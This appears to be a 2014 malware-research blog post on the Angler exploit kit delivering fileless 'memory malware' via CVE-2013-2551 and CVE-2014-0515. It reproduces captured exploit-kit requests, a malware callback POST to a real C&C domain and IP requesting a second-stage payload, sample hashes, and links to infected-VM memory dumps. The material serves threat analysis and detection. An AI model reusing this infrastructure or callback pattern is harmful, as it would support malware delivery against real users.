 |
| Matrix - Agent Jackson avoiding bullets |
(First edition : I asked help to study this - Hopefully, more technical details to come soon)
Few days ago I spotted a new pattern in some Angler EK threads :
 |
| New pattern in a Vawtrak Thread from Angler EK Fired : CVE-2013-2551 - 2014-08-28 |
 |
| New pattern in another Vawtrak Thread from Angler EK Fired : CVE-2014-0515 - 2014-08-29 |
GET http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee/count?b=1 HTTP/1.1
Accept: */*
Referer: http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: rwvs30r2zq.akdnbfb.com
Connection: Keep-Alive
Wondering what it was and going over different infections paths I spotted only one thread without this "new" count?b. [Note : on the 2014-08-31 count?b appeared on that thread too]
 |
| Angler EK - 2014-08-28 "Memory Malware" thread |
Exploits' hashes were the same as on all other threads but my usual tools were not able to gather the payload and what surprised me more is that HIPS (like Faronics antiexec) were bypassed (note : I tried Malwarebytes AntiExploit and it was able to spot the ROP and Stack pivoting)
I spent some time to figure out what was happening here :
Angler EK is now able to infect an host without writing the malware on the drive (it's injected directly in the process running the exploited plugin)
 | ||
| Angler EK (no landing on this screen, CVE-2014-0515 fired) and Call back from the malware injected in Internet Explorer 2nd Stage drop : 275c5f650261e80d864faf7cc6b70774 injecting itself to explorer and then gathering Necurs on the same C&C (e.g. : be84c4689912d5689283b4b7efcaf8f2 - 2014-08-28 , b0e3e860a2dc62cb40fd6ef897ad592b 2014-08-29 , 5830dfde30873176d05604677bab6bd9 2014-08-30) |
Malware call back in https to koqpisea.in :
217.23.3.204
49981 | 217.23.0.0/20 | WORLDSTREAM | NL | WORLDSTREAM.NL | WORLDSTREAM
Call for 2nd Stage payload looks like :
POST https://koqpisea.in/ HTTP/1.1
Host: koqpisea.in
Content-Length: 94
Connection: Keep-Alive
Cache-Control: no-cache
{"protocolVersion":1,"buildId":1049,"id":"35d1754a1c4672f2","tags":[{"type":"dll","64bit":0}]}
This feature opens a wide range of possibilities. Aside being a powerful way to bypass AV, an ideal way for one time stealer or loader (Pony, Jolly Roger, Andromeda, Smoke Bot, etc..), it also allows a detailed check of the infected host before being a little more noisy and writing anything on disk. It makes it also difficult to grab the dropper (you have to get it from the memory or from the recorded traffic then decode it). This is a powerful move for the attack side.
Additionnal illustrations :
 |
| Injected plugin-container calling C&C after successful "memory malware" infection via Silverlight on Firefox and Windows 7 2014-08-30 |
 |
| Image : Courtesy of Will Metcalf from Emerging Threats Java calling payload then "Memory payload" activity captured by his Cuckoo instance 2014-08-28 |
Hopefully more to come soon.
Credits: Thanks to Will Metcalf (Emerging Threats) and Mieke Verburgh (Malwarebytes) for help and advices.
Files:
AnglerEK_MM_2014-08-31 (Fiddlers + C&C calls - Owncloud)
If you want to play with Volatility or whatever, here is the memory (Mega) of a VM when IE was injected and calling C&C (IE pid : 860)
AnglerEK_MM_2014-08-31 (Fiddlers + C&C calls - Owncloud)
If you want to play with Volatility or whatever, here is the memory (Mega) of a VM when IE was injected and calling C&C (IE pid : 860)
 |
| Capture of Fiddler just before pausing the VM 2014-08-30 |
Read More:
The Hunt for Memory Malware - 2013-11-06 - Albert Fruz
In-Memory Execution of an Executable - Amit Malik - SecurityXploded